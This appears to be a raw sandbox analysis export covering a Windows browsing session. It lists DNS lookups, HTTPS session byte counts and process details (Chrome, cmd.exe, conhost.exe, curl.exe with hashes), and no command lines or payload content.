Mar 21, 2025 18:44:30.084924936 CET | 192.168.2.6 | 1.1.1.1 | 0x12e1 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 21, 2025 18:44:30.085071087 CET | 192.168.2.6 | 1.1.1.1 | 0x443d | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 21, 2025 18:44:30.592247009 CET | 192.168.2.6 | 1.1.1.1 | 0xc715 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 21, 2025 18:44:30.592390060 CET | 192.168.2.6 | 1.1.1.1 | 0x51a7 | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 21, 2025 18:44:42.969039917 CET | 192.168.2.6 | 1.1.1.1 | 0xf02b | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 21, 2025 18:44:42.969244003 CET | 192.168.2.6 | 1.1.1.1 | 0x9b1d | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 21, 2025 18:44:43.436299086 CET | 192.168.2.6 | 1.1.1.1 | 0x6512 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 21, 2025 18:44:43.591180086 CET | 192.168.2.6 | 1.1.1.1 | 0x6ad0 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 21, 2025 18:44:43.591464996 CET | 192.168.2.6 | 1.1.1.1 | 0xf021 | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 21, 2025 18:44:56.329937935 CET | 192.168.2.6 | 1.1.1.1 | 0x916e | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 21, 2025 18:45:32.427767038 CET | 192.168.2.6 | 1.1.1.1 | 0x7350 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 21, 2025 18:45:32.427902937 CET | 192.168.2.6 | 1.1.1.1 | 0xf418 | Standard query (0) | 65 | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type (65 = HTTPS record, RFC 9460) | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Mar 21, 2025 18:44:28.030550003 CET | 1.1.1.1 | 192.168.2.6 | 0x8e77 | No error (0) | 65 | IN (0x0001) | false | |||
Mar 21, 2025 18:44:28.030592918 CET | 1.1.1.1 | 192.168.2.6 | 0x6834 | No error (0) | 142.251.40.196 | A (IP address) | IN (0x0001) | false | ||
Mar 21, 2025 18:44:29.140876055 CET | 1.1.1.1 | 192.168.2.6 | 0x65ff | No error (0) | 44.203.127.19 | A (IP address) | IN (0x0001) | false | ||
Mar 21, 2025 18:44:29.802022934 CET | 1.1.1.1 | 192.168.2.6 | 0x6ac9 | No error (0) | jsdelivr.map.fastly.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 21, 2025 18:44:29.803500891 CET | 1.1.1.1 | 192.168.2.6 | 0xaf74 | No error (0) | jsdelivr.map.fastly.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 21, 2025 18:44:29.803500891 CET | 1.1.1.1 | 192.168.2.6 | 0xaf74 | No error (0) | 151.101.193.229 | A (IP address) | IN (0x0001) | false | ||
Mar 21, 2025 18:44:29.803500891 CET | 1.1.1.1 | 192.168.2.6 | 0xaf74 | No error (0) | 151.101.129.229 | A (IP address) | IN (0x0001) | false | ||
Mar 21, 2025 18:44:29.803500891 CET | 1.1.1.1 | 192.168.2.6 | 0xaf74 | No error (0) | 151.101.65.229 | A (IP address) | IN (0x0001) | false | ||
Mar 21, 2025 18:44:29.803500891 CET | 1.1.1.1 | 192.168.2.6 | 0xaf74 | No error (0) | 151.101.1.229 | A (IP address) | IN (0x0001) | false | ||
Mar 21, 2025 18:44:30.186463118 CET | 1.1.1.1 | 192.168.2.6 | 0x12e1 | No error (0) | 172.217.165.142 | A (IP address) | IN (0x0001) | false | ||
Mar 21, 2025 18:44:30.692590952 CET | 1.1.1.1 | 192.168.2.6 | 0xc715 | No error (0) | 142.251.40.142 | A (IP address) | IN (0x0001) | false | ||
Mar 21, 2025 18:44:43.109517097 CET | 1.1.1.1 | 192.168.2.6 | 0xf02b | No error (0) | 208.80.154.240 | A (IP address) | IN (0x0001) | false | ||
Mar 21, 2025 18:44:43.569705009 CET | 1.1.1.1 | 192.168.2.6 | 0x6512 | No error (0) | 44.203.127.19 | A (IP address) | IN (0x0001) | false | ||
Mar 21, 2025 18:44:43.698257923 CET | 1.1.1.1 | 192.168.2.6 | 0x6ad0 | No error (0) | 208.80.154.240 | A (IP address) | IN (0x0001) | false | ||
Mar 21, 2025 18:44:56.478513002 CET | 1.1.1.1 | 192.168.2.6 | 0x916e | No error (0) | 44.203.127.19 | A (IP address) | IN (0x0001) | false | ||
Mar 21, 2025 18:45:32.533251047 CET | 1.1.1.1 | 192.168.2.6 | 0x7350 | No error (0) | 142.251.40.238 | A (IP address) | IN (0x0001) | false | ||
Mar 21, 2025 18:45:32.535382032 CET | 1.1.1.1 | 192.168.2.6 | 0xf418 | No error (0) | 65 | IN (0x0001) | false |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.6 | 49701 | 44.203.127.19 | 443 | 4564 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-21 17:44:29 UTC | 711 | OUT | |
2025-03-21 17:44:29 UTC | 247 | IN | |
2025-03-21 17:44:29 UTC | 16137 | IN | |
2025-03-21 17:44:29 UTC | 16384 | IN | |
2025-03-21 17:44:29 UTC | 16384 | IN | |
2025-03-21 17:44:29 UTC | 16384 | IN | |
2025-03-21 17:44:29 UTC | 16384 | IN | |
2025-03-21 17:44:29 UTC | 16384 | IN | |
2025-03-21 17:44:29 UTC | 16384 | IN | |
2025-03-21 17:44:29 UTC | 16384 | IN | |
2025-03-21 17:44:30 UTC | 16384 | IN | |
2025-03-21 17:44:30 UTC | 16384 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.6 | 49706 | 151.101.193.229 | 443 | 4564 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-21 17:44:30 UTC | 623 | OUT | |
2025-03-21 17:44:30 UTC | 755 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.6 | 49707 | 151.101.193.229 | 443 | 4564 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-21 17:44:30 UTC | 608 | OUT | |
2025-03-21 17:44:30 UTC | 770 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 536 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN | |
2025-03-21 17:44:30 UTC | 1378 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.6 | 49709 | 172.217.165.142 | 443 | 4564 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-03-21 17:44:30 UTC | 708 | OUT | |
2025-03-21 17:44:30 UTC | 831 | IN | |
2025-03-21 17:44:30 UTC | 389 | IN | |
2025-03-21 17:44:30 UTC | 1220 | IN | |
2025-03-21 17:44:30 UTC | 1220 | IN | |
2025-03-21 17:44:30 UTC | 1220 | IN | |
2025-03-21 17:44:30 UTC | 855 | IN |
Target ID: | 2 |
Start time: | 13:44:16 |
Start date: | 21/03/2025 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff63b000000 |
File size: | 3'388'000 bytes |
MD5 hash: | E81F54E6C1129887AEA47E7D092680BF |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | false |
Target ID: | 3 |
Start time: | 13:44:22 |
Start date: | 21/03/2025 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff63b000000 |
File size: | 3'388'000 bytes |
MD5 hash: | E81F54E6C1129887AEA47E7D092680BF |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | false |
Target ID: | 12 |
Start time: | 13:44:27 |
Start date: | 21/03/2025 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff63b000000 |
File size: | 3'388'000 bytes |
MD5 hash: | E81F54E6C1129887AEA47E7D092680BF |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Target ID: | 14 |
Start time: | 13:44:42 |
Start date: | 21/03/2025 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x2a0000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | false |
Target ID: | 15 |
Start time: | 13:44:42 |
Start date: | 21/03/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff68dae0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | false |
Target ID: | 16 |
Start time: | 13:44:42 |
Start date: | 21/03/2025 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x2a0000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | false |
Target ID: | 17 |
Start time: | 13:44:42 |
Start date: | 21/03/2025 |
Path: | C:\Windows\SysWOW64\curl.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xfb0000 |
File size: | 470'528 bytes |
MD5 hash: | 44E5BAEEE864F1E9EDBE3986246AB37A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | false |